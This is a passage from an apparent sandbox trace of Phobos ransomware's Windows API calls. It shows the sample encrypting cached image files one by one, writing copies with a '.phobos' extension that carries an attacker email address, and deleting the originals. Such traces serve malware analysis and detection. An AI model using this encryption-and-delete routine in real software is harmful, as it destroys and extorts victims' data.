lpNumberOfBytesRead=0x2a0fae4*=0xa23, lpOverlapped=0x0) returned 1 [0183.679] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa30, dwBufLen=0xa30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa30) returned 1 [0183.679] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa30, lpOverlapped=0x0) returned 1 [0183.680] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0183.680] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.680] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0183.680] CryptDestroyKey (hKey=0xa32d68) returned 1 [0183.680] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0183.680] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0183.680] CloseHandle (hObject=0x14c) returned 1 [0183.680] CloseHandle (hObject=0x180) returned 1 [0183.680] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbee62t[1].jpg")) returned 1 [0183.681] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0183.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeedpr[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0183.682] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=7335) returned 1 [0183.682] CloseHandle (hObject=0x180) returned 1 [0183.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeedpr[1].jpg")) returned 0x2020 [0183.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeedpr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeedpr[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0183.682] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.683] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeedpr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0183.683] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0183.683] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.683] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1ca7, lpOverlapped=0x0) returned 1 [0183.694] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1cb0, dwBufLen=0x1cb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1cb0) returned 1 [0183.694] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1cb0, lpOverlapped=0x0) returned 1 [0183.695] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0183.696] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.696] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0183.696] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0183.696] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0183.696] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0183.696] CloseHandle (hObject=0x180) returned 1 [0183.696] CloseHandle (hObject=0x14c) returned 1 [0183.696] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeedpr[1].jpg")) returned 1 [0183.697] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0183.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetpb[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0183.698] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2543) returned 1 [0183.698] CloseHandle (hObject=0x14c) returned 1 [0183.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetpb[1].jpg")) returned 0x2020 [0183.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetpb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetpb[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0183.698] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.698] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetpb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0183.699] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0183.699] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.699] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x9ef, lpOverlapped=0x0) returned 1 [0183.822] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9f0, dwBufLen=0x9f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9f0) returned 1 [0183.822] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x9f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x9f0, lpOverlapped=0x0) returned 1 [0183.823] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0183.823] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.823] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0183.823] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0183.823] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0183.823] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0183.823] CloseHandle (hObject=0x14c) returned 1 [0183.823] CloseHandle (hObject=0x180) returned 1 [0183.823] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbeetpb[1].jpg")) returned 1 [0183.824] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0183.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef54r[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0183.824] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2088) returned 1 [0183.824] CloseHandle (hObject=0x180) returned 1 [0183.824] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef54r[1].jpg")) returned 0x2020 [0183.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef54r[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef54r[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0183.825] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.825] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef54r[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0183.825] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0183.825] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.825] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x828, lpOverlapped=0x0) returned 1 [0183.883] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x830, dwBufLen=0x830 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x830) returned 1 [0183.883] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x830, lpOverlapped=0x0) returned 1 [0183.888] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0183.888] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.888] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0183.888] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0183.888] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0183.888] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0183.888] CloseHandle (hObject=0x180) returned 1 [0183.888] CloseHandle (hObject=0x14c) returned 1 [0183.888] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbef54r[1].jpg")) returned 1 [0183.889] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0183.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbq0[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0183.889] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6565) returned 1 [0183.889] CloseHandle (hObject=0x14c) returned 1 [0183.889] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbq0[1].jpg")) returned 0x2020 [0183.889] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbq0[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbq0[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0183.890] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.890] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbq0[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0183.890] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0183.890] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.890] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x19a5, lpOverlapped=0x0) returned 1 [0183.985] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x19b0, dwBufLen=0x19b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x19b0) returned 1 [0183.985] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x19b0, lpOverlapped=0x0) returned 1 [0183.986] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0183.986] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.987] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0183.987] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0183.987] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0183.987] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0183.987] CloseHandle (hObject=0x14c) returned 1 [0183.987] CloseHandle (hObject=0x180) returned 1 [0183.987] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbq0[1].jpg")) returned 1 [0183.988] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0183.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbrz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0183.989] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9753) returned 1 [0183.989] CloseHandle (hObject=0x180) returned 1 [0183.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbrz[1].jpg")) returned 0x2020 [0183.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 